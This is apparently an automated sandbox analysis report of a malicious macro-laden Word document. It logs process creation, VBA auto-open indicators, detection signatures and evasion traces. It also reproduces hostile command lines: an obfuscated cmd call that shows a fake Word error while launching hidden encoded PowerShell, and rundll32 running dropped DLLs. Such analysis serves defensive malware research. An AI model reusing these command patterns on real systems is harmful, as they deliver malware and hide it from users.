                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D389512_2_006D3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C7B6312_2_006C7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D4B4112_2_006D4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C873612_2_006C8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D63C112_2_006D63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D5A6112_2_006D5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D687F12_2_006D687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CEA4C12_2_006CEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CF44412_2_006CF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CE05A12_2_006CE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C4A3512_2_006C4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C9A3712_2_006C9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C2A3012_2_006C2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D7A0F12_2_006D7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D340A12_2_006D340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C88E512_2_006C88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D12E212_2_006D12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C1CFA12_2_006C1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D26F512_2_006D26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C96CD12_2_006C96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D20C512_2_006D20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D8ADC12_2_006D8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006DA0AF12_2_006DA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C62A312_2_006C62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C48BD12_2_006C48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C60B912_2_006C60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C80BA12_2_006C80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C128012_2_006C1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D889D12_2_006D889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CC76912_2_006CC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D0B6812_2_006D0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C8F7812_2_006C8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C5B7912_2_006C5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CE37712_2_006CE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D177312_2_006D1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D234912_2_006D2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D8F4912_2_006D8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D9B4512_2_006D9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CB75F12_2_006CB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C675412_2_006C6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C153C12_2_006C153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CBB3A12_2_006CBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CF53612_2_006CF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D0D3312_2_006D0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D0F0C12_2_006D0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D7D0312_2_006D7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D5D1D12_2_006D5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D8D1C12_2_006D8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D7F1F12_2_006D7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D511B12_2_006D511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D2B1612_2_006D2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CB11212_2_006CB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D71EF12_2_006D71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D67E912_2_006D67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CD7EB12_2_006CD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D3FE712_2_006D3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D31E212_2_006D31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C9FDC12_2_006C9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D1BDF12_2_006D1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C17AC12_2_006C17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D73AC12_2_006D73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C69A012_2_006C69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D6DB912_2_006D6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D61B812_2_006D61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006CF98C12_2_006CF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D878F12_2_006D878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006D958612_2_006D9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C839D12_2_006C839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C6D9F12_2_006C6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_006C799812_2_006C7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EB41F13_2_001EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EEE7813_2_001EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E2C6313_2_001E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F389513_2_001F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E568E13_2_001E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F42DA13_2_001F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EC0C613_2_001EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F02C313_2_001F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E873613_2_001E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F4B4113_2_001F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E7B6313_2_001E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F63C113_2_001F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7A0F13_2_001F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F340A13_2_001F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E9A3713_2_001E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E4A3513_2_001E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E2A3013_2_001E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EE05A13_2_001EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EEA4C13_2_001EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001EF44413_2_001EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F687F13_2_001F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F5A6113_2_001F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F889D13_2_001F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E128013_2_001E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E48BD13_2_001E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E80BA13_2_001E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E60B913_2_001E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FA0AF13_2_001FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E62A313_2_001E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F8ADC13_2_001F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E96CD13_2_001E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F20C513_2_001F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E1CFA13_2_001E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F26F513_2_001F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001E88E513_2_001E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F12E213_2_001F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F7F1F13_2_001F7F1F
                      Source: pack-91089 416755919.doc OLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentation OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open, Name: Document_open
                      Source: pack-91089 416755919.doc OLE indicator, VBA macros: true
                      Source: 00000005.00000002.2104426345.0000000000356000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2104546629.0000000001CC6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: rundll32.exe, 00000006.00000002.2113194713.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108067527.0000000002200000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
                      Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@24/8@7/5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00221C88 CreateToolhelp32Snapshot, 14_2_00221C88
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString, 7_2_10002D70
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ck-91089 416755919.doc
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD1FE.tmp
                      Source: pack-91089 416755919.doc OLE indicator, Word Document stream: true
                      Source: pack-91089 416755919.doc OLE document summary: title field not present or empty
                      Source: pack-91089 416755919.doc OLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: pack-91089 416755919.docVirustotal: Detection: 36%
                      Source: pack-91089 416755919.docReversingLabs: Detection: 43%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wcuhm\nost.bdw',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Afhsry\advki.tth',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105619748.0000000002320000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2106645654.0000000002BA7000.00000004.00000040.sdmp
                      Source: pack-91089 416755919.docInitial sample: OLE summary subject = Missouri success Senior Refined Cambridgeshire Refined Rubber Keyboard wireless Markets Concrete hacking

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: pack-91089 416755919.doc Stream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                      Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788 Name: Owppnp8hah4xo788
                      Obfuscated command line found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                      PowerShell case anomaly found
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD
                      Suspicious powershell command line found
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret 7_2_10008098
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret 7_2_10004AED

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Czsbnlmzhou\heljhxhmap.nib:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Tshsltpdkbydgac\umncisajimhcut.zje:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Nrnhwjwgkqopncg\hahzpwlqhuedal.zvs:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wcuhm\nost.bdw:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Omzikkfxzmn\texvcnoeud.iob:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Afhsry\advki.tth:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Tjgkecgvqxx\dxuouhyssc.uio:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560, Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe, File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 14_2_0022109C FindFirstFileW
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2104363576.0000000000294000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: rundll32.exe, 00000007.00000002.2107524438.000000000069D000.00000004.00000020.sdmpBinary or memory string: PPTP00VMware_S
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information queried: ProcessInformation
